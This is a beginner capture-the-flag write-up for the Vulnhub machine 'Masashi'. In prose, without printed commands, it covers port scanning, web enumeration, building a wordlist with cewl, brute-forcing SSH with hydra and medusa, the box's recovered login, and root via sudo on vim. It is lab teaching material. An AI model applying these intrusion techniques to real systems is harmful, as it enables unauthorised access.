Masashi (Vulnhub)

This is an excellent beginner box by Donald. The emphasis is on enumeration and how one can easily fall into a rabbit hole when you over zealously follow the initial enumeration like an automaton. Although it could be argued that following 100% like an automaton could land you on the correct path :-)

/etc/hosts

It is a good habit learned from HackTheBox to always make an entry on the /etc/hosts file. This can assist where a vhosts brute force is necessary. Since these notes are made after-the-fact, it is not necessary to go down the brute-force of vhosts route.

nmap

We run our nmap scan.

TCP Ports 22 and 80 are open. There is not much one can do with the ssh port (22). There is a man-in-the-middle vulnerability associated with this version and you can read more about it here. That is not the vector pursued on this writeup as I believe it is not the intended route for exploitation.

A UDP scan was abandoned after 1 hour due to apparent rate limiting issues I could not resolve. The scan did find 1 open port however it was abandoned before the full report regarding the identity of the port scanned.

Taking a look at that port 80 we arrive at the default Apache page. There is no menu to click through.

A common practice for the beginner CTF boxes is trying to browse /robots.txt. It is often a useful shortcut when you are in a hurry. A gobuster scan is more effective to enumerate more files.

Gobuster reveals two files we can follow ( /robots.txt, /security.txt )

We follow /robots.txt and that further reveals 3 files we can browse ( /snmpwalk.txt , sshfolder.txt and /security.txt ).

We have a look at these files. First, we notice on /snmpwalk.txt what appears to be scan results from SNMP aware devices. The TFTP entry stands out here because on our UDP scan earlier; nmap did indicate at least one UDP port open. This suggests that UDP port 1337 may be open.

When we perform an nmap scan on that specific port, we get a confirmation that port is indeed open.

Let us return to the files listed on /robots.txt earlier. We have not looked at /sshfolder.txt yet but when we do, we find details about a possible username that can be used on SSH. We learn the username is possibly sv5 and that on the root of the TFTP service we should find the world-readable file called id_rsa.pub. That is a useful file for passwordless login to SSH. We will pursue that in a moment.

Let us visit the last entry on /robots.txt. It turns out to be the obligatory taunt which is common among CTF box creators :-). Hats off to you @lorde_zw

Now we return to that TFTP service in pursuit of that id_rsa.pub file for a passwordless login. We find a hit to use a password list generating tool called cewl that sources words from a webpage.

So, we do that, we use cewl to create password list from the index page as suggested by the creator.

Then, we try hydra with our custom password list and immediately regret this decision because hydra is so slow for this task.

Instead, we try medusa

... and after a few seconds, we profit! username is sv5 and password is whoistheplug.

We try those details on SSH and we log in successfully.

as we cat user.txt we are greeted with a lovely message from the creator @lorde_zw Donald Munengiwa

Now onto Privilege escalation. A habit I have developed is to run sudo -l for any chance that we are part of sudoers. I do this first even before running the awesome Privilege Escalation Awesome Script ( Thank you, IppSec ). So let us do that.

That tells us that we can run VIM ( vi ) with escalated privileges. VIM is one of the "Living-off-the-land" binaries listed on GTFOBINS that could be used to break into a privileged shell under these circumstances. So we try that. It is better shown on the .gif below